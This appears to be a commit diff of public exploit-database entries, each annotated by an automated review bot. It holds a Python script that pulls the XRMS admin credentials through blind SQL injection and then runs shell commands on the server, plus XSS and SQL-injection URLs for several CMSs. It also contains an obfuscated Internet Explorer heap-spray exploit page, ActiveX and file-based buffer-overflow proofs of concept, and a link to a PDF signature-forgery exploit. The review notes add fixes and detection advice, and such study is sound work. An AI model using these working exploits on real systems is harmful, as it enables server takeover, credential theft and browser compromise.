found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
duser.append(usercharac[f])
found = 1
return duser
def getusernamelength():
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
while (found != 1):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Length found at position: " + str(i)
found = 1
length = i
return length
i = i + 1
def password(length):
length = length + 1
dpassword = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found. Character is: " + usercharac[f]
dpassword.append(usercharac[f])
found = 1
return dpassword
def login(domain,user,password):
cookie = "XRMS=iseeurgettinown4d"
url = 'http://'+domain+'/login-2.php'
headers = { 'Cookie' : cookie }
data = urllib.urlencode([('username',user),('password',password)])
a1 = urllib2.Request(url,data,headers)
a2 = urllib2.urlopen(a1)
output = a2.read()
if output.find('PEAR.php') > 0:
print " [+] Logged In"
def commandexec(domain,command):
cookie = "XRMS=iseeurgettinown4d"
cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
headers = { 'Cookie' : cookie }
data = None
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
b1 = urllib2.Request(url,data,headers)
b2 = urllib2.urlopen(a1)
output = b2.read()
first = output.find('0x41') + 4
last = output.find('14x0') - 4
return output[first:last]
banner()
if len(sys.argv) < 2:
usage()
domain = sys.argv[1]
print " [+] Grabbing username length"
length = getusernamelength()
print " [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print " [+] Grabbing password hash"
tmppass = password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print " [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
cmd = raw_input(' [+] Run a command: ')
if cmd == 'quit':
print " [-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print " [+] "+ commandexec(domain,cmd)
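Review bot: `b2 = urllib2.urlopen(a1)` in commandexec() refers to `a1`, a name local to login(); the request built on the preceding line is `b1`. The bigger logic problem is in the timing loop above it: the bare `except: pass` around `urllib2.urlopen(get)` swallows every error, so a timeout or refused connection is measured as elapsed time and reported as a found character; catch `urllib2.URLError` and discard that measurement instead. The hardcoded `XRMS=iseeurgettinown4d` cookie also deserves a comment in the file: the script assumes the server accepts a client-chosen session id (it even renames the PHPSESSID it received to XRMS), which is the session-fixation half of the issue and the part an operator closes by having the application regenerate the session id on login.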


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42423/info
PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PaoBacheca 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/paobacheca/demo/index.php/"><script>alert(document.cookie);</script>
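Review bot: the payload sits in the path after index.php/, so the issue is the page reflecting its own request URI (PHP_SELF or REQUEST_URI style) into an attribute without escaping; the hunk does not say where the reflection occurs. On the defensive side this class of reflection is closed by running the value through htmlspecialchars() with ENT_QUOTES before output, or by using a fixed form action rather than echoing the current URL.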


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42423/info
PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PaoBacheca 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/paobacheca/demo/scrivi.php/"><script>alert(document.cookie);</script>


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/42424/info
Rock Band CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--
http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4--
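Review bot: both examples place a negative integer followed by UNION SELECT into `year` and `id`, which only works because news.php interpolates the raw parameter into the query; casting with (int), or binding the values as integer parameters in a prepared statement, removes both issues at once. For detection, a UNION keyword arriving in a parameter that should be numeric is a cheap and low-noise rule.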

platforms/php/webapps/34456.txt Executable file

@ -0,0 +1,132 @@
source: http://www.securityfocus.com/bid/42425/info
JBoard is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
JBoard 0.2 is vulnerable; prior versions may also be affected.
================================================
JBoard <= 2.0 Commercial Version Sql/Xss Exploit
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /&#039; \ __ /&#039;__`\ /\ \__ /&#039;__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /&#039; _ `\ \/\ \/_/_\_<_ /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] Support e-mail : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
Site product: http://allpublication.ru/
Demo: http://allpublication.ru/board/demo/
admin; admin
Version: 2.0
-----------------------------------------------------------------
Xss Exploit:
editform.php?notice=<script>alert(&#039;www.example.com&#039;)</script>
*?user_title=</title><script>alert(&#039;www.example.org&#039;)</script>
*any pages because vulnerability in inc/head.inc.php
core/edit_user_message.php?edit_user_message="><script>alert(www.example.net)</script><noscript>
------------------------------------------------------------------
SQL-Inj3ct0r Exploit:
1) sboard.php
elseif (!@$_GET[&#039;id_mess&#039;] && !@$_GET[&#039;id_cat&#039;] && (@$_GET[&#039;op&#039;] == "all_cat" || @$_GET[&#039;city&#039;])) require_once("core/all_cat.php");
2) all_cat.php
if ($c[&#039;print_top&#039;] == "yes") require_once("inc/top_add.inc.php");
3) top_add.inc.php
There is a request to the database with the parameter $_GET[&#039;city&#039;], which is never filtered
if (@$_GET[&#039;city&#039;])
{
$from_city_query = mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = &#039;".$_GET[&#039;city&#039;]."&#039; LIMIT 1");
if (mysql_num_rows ($from_city_query) == 1)
{
$from_city = mysql_fetch_assoc ($from_city_query);
$city_from_search = " AND city = &#039;".$from_city[&#039;city_name&#039;]."&#039; ";
The result is used in the second query:
$top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = &#039;old&#039; ".@$city_from_search." ORDER by hits DESC LIMIT $limit");
if (mysql_num_rows($top_add))
{
?>
<H4><?=$lang[610]?></H4>
<table border="0" class="GRayBox" cellpadding="0" cellspacing="0">
<tr class="top">
<td class="img1">&nbsp;</td>
<td class="img2">&nbsp;</td>
<td class="img3">&nbsp;</td>
</tr>
<tr>
<td class="imgL">&nbsp;</td>
<td class="t"><a href="#">
<?
while ($top = mysql_fetch_assoc ($top_add))
{
$tip = str_replace("\r\n"," ", htmlspecialchars($top[&#039;text&#039;]));
echo "<a href=\"".$h."/advertisement/nesting/".$top[&#039;id_category&#039;]."/kind/".$top[&#039;board_id&#039;]."/\" onmouseover=\"Tip(&#039;".$tip."&#039;)\"><strong>".$top[&#039;title&#039;]."</strong></a>";
Request number 1:
a &#039;UNION SELECT 1 --
Request number 2:
a &#039;UNION SELECT 1,2,3,4,5,6, concat_ws (0x3,login,password), 8,9,10,1 1,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
Transferred to the number (* 16):
0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361745f7773283078332c6c6f67696e2c70617373776f7264292c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312c33322c33332c33342046524f4d206a625f61646d696e202d2d20
As a result, we obtain the following query:
sboard.php?city=a&#039;+union+select+0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20% 20 -% 20
-------------------------------------------------------------------
SQL-Inj3ct0r Exploit:
POST request to /core/select.php
aaaaaaa &#039;UNION SELECT 1,2, concat_ws (0x3, login, password), 4,5,6 FROM jb_admin --
Output will be the last element of the drop-down
A vulnerable piece of code: paste the whole file)
---------------------------------
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
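Review bot: the version is inconsistent within the hunk: the BID text says "JBoard 0.2 is vulnerable", the banner says "JBoard <= 2.0" and the demo block says "Version: 2.0". On the code excerpt, the write-up treats two separate defects as one: the first query (`SELECT city_name FROM jb_city WHERE city_translit = '...$_GET['city']...'`) concatenates user input directly, and the second query then concatenates `$from_city['city_name']` read back from the database, so escaping `city` at input would still leave a second-order path through stored city names. Both queries need parameter binding (mysqli or PDO prepared statements; the mysql_* API used here cannot do it). The XSS entry for `user_title` in inc/head.inc.php is the same missing output escaping, this time inside <title>. The "Transferred to the number (* 16)" line is just the second request hex-encoded, and "10,1 1,12" in that request is an editing error in the original text.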


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42430/info
Amiro.CMS is prone to multiple input-validation vulnerabilities including multiple cross-site scripting issues, an HTML-injection issue, and an information-disclosure issue.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user and disclose sensitive information which may aid in launching further attacks.
Amiro.CMS 5.4.0 is affected; other versions may be vulnerable as well.
'status_msg' = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a: 2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert (document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}}
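Review bot: the payload is a PHP serialize() string (a:2:{s:3:"sys";...}, with the closing }}} still visible) carried in `status_msg`, which means the application unserializes client-supplied data and then renders the `msg` member unescaped; as shown the opening braces appear as parentheses and spaces have been inserted, so the line is not byte-accurate. The hunk does not say where status_msg is read from (cookie or request parameter). Defensively, unserialize() on client input is the larger risk than the XSS: a signed (HMAC) or JSON-encoded status message plus output escaping closes both.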


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42436/info
SyntaxCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SyntaxCMS 1.3 is vulnerable; prior versions may also be affected.
http://www.example.com/content/general/browse/?x=37&y=15&rows_per_page=10+ANY_SQL+--+&page=2
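Review bot: `rows_per_page=10+ANY_SQL+--+` lands in a LIMIT clause, and LIMIT operands cannot be bound as string parameters on MySQL, so this is the one place where escaping quotes does not help; the value has to be cast to an integer and range-checked before it reaches the query. The hunk gives only the URL and no vulnerable code, so the location of the LIMIT construction is unstated.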


@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/42418/info
Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.
Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.
<object classid=&#039;clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510&#039; id=&#039;target&#039; />
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language=&#039;vbscript&#039;>
arg1=-2147483647
target.ShowBar arg1
</script>
</span></span>
</code></pre>
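Review bot: the trailing `</span></span>` and `</code></pre>` lines are markup from the page the PoC was copied from, not part of the test page, and the `<input>` calls `tryMe()`, which is never defined; the inline VBScript block fires the `ShowBar` call on load regardless. For defenders, the CLSID on the first line (98C92840-EB1C-40BD-B6A5-395EC9CD6510) is what a kill bit targets: a DWORD "Compatibility Flags" of 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} stops Internet Explorer from instantiating the control.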


@ -0,0 +1,82 @@
<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<sc?ript >
func?tion stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
func?tion cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.create?Element("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
func?tion b2()
{
try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
func?tion a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ sc?ript >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
 <p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
  <input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
  
  <input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
  <sc?ript >  
var bar=0 
var line="||" 
var amount="||" 
count() 
func?tion count(){ 
bar=bar+2 
amount =amount + line 
document.loading.chart.value=amount 
document.loading.percent.value=bar+"%" 
if (bar<99) 
{setTimeout("count()",500);} 
else 
{window.location = "http://www.google.com.hk";} 
}</ sc?ript >
 </p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>
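Review bot: missing documentation: unlike the other files in this commit, this one carries no source, title, affected product or version header, and it depends on a storm.swf that is not in the commit, so the ActiveXObject('ShockwaveFlash.ShockwaveFlash') check in cid() gates the trigger on Flash being present without the file saying why. Structurally the document has a second <body> after the first </body>, which is invalid HTML. For detection, the observable pattern is several thousand img elements whose className is set to a repeated unescape'd 0x1414 string around CollectGarbage() calls, followed by contentEditable and applyElement(frameset) on a marquee element; the keywords broken with "?" (sc?ript, func?tion) are there to defeat naive signature matching, so rules should key on the structure rather than the literal tokens.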

platforms/windows/dos/34460.py Executable file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/42434/info
Sonique is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Sonique 2.0 Beta Build 103 is vulnerable; other versions may also be affected.
#Date: 12/8/2010
#Author:Hamza_hack_dz & Black-liondz1
#Software Link:Download: http://www.softpedia.com/progDownload/Sonique-2-Download-6707.html # #
#Version:sonique2
# web:www.sa-hacker.com/vb
# Email:hamza_hack_dz@hotmail.com &b-l@ho9mail.com
#!/user/bin/python
filename = "sa-hacker.xpl"
junk = "\x41" * 500000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
# Inj3ct0r.com [2010-08-12]
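Review bot: the `#!/user/bin/python` shebang is on line 7, after the comment block, and points at /user rather than /usr, so it does nothing; it belongs on the first line as `#!/usr/bin/env python`. The header also says nothing about what a .xpl file is to Sonique or how it is opened, so the reader cannot tell which parser the 500000-byte string exercises.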


@ -0,0 +1,46 @@
#----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow #
# Date: August 24 2014 #
# Exploit Author: Moroccan Kingdom (MKD) #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx # #
# Version: 1.4 #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit (eng) #
#----------------------------------------------------------------------------------------------------#
import subprocess,time
import sys,os
if os.name == "nt" :
subprocess.call('cls', shell=True)
os.system("color c")
else :
subprocess.call('clear', shell=True)
time.sleep(1)
print '''
///////////////////////////////////////////////////////////////////////////////
/ M.O.R.O.C.C.A.N /
/ K.I.N.G.D.O.M /
/ [MKD] /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom /
/ To run this exploit Go to DOS and then go to the folder path program and /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS... /
/////////////////////////////////////////////////////////////////////////////// '''
JNK = "A" * 284
NEH = "B" * 4
SEH = "C" * 4
SHL = "S" * 400
POC = JNK + NEH + SEH + SHL
try :
file = open("poc.txt", "w")
file.write(POC)
file.close()
print "\n[*] file created successfully"
except:
print "[#] error to create file"
close = raw_input("\n[!] press any button to close()")
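Review bot: `file` shadows the Python builtin and the bare `except:` discards the reason the write failed; `except IOError as e:` with `e` in the message would make "[#] error to create file" actionable. The banner tells the user to pass the file contents to hcc.exe as an argument, but nothing in the hunk states which input the 284-byte distance to the SEH record was measured for, nor which build of HTML Help Workshop 1.4 was tested beyond the OS list.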


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42377/info
The Portable Document Format (PDF) specification is prone to a signature-collision attack when signing PDF documents.
An attacker can exploit this issue to create PDF documents containing forged signatures. Successfully exploiting this issue will result in the application accepting the signature of a document as valid when it is not. This may result in a false sense of security; other attacks are also possible.
All products conforming to the specification for signing PDF documents are affected by this issue.
http://www.exploit-db.com/sploits/34437.tar.gz
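Review bot: the file consists of the BID text plus a link to 34437.tar.gz; nothing in it describes the collision (which hash, which signature object, which verification step accepts the forged document) or which signing products were tested, so a reader has to fetch the tarball to learn anything. A one-paragraph summary of the tarball's contents belongs here.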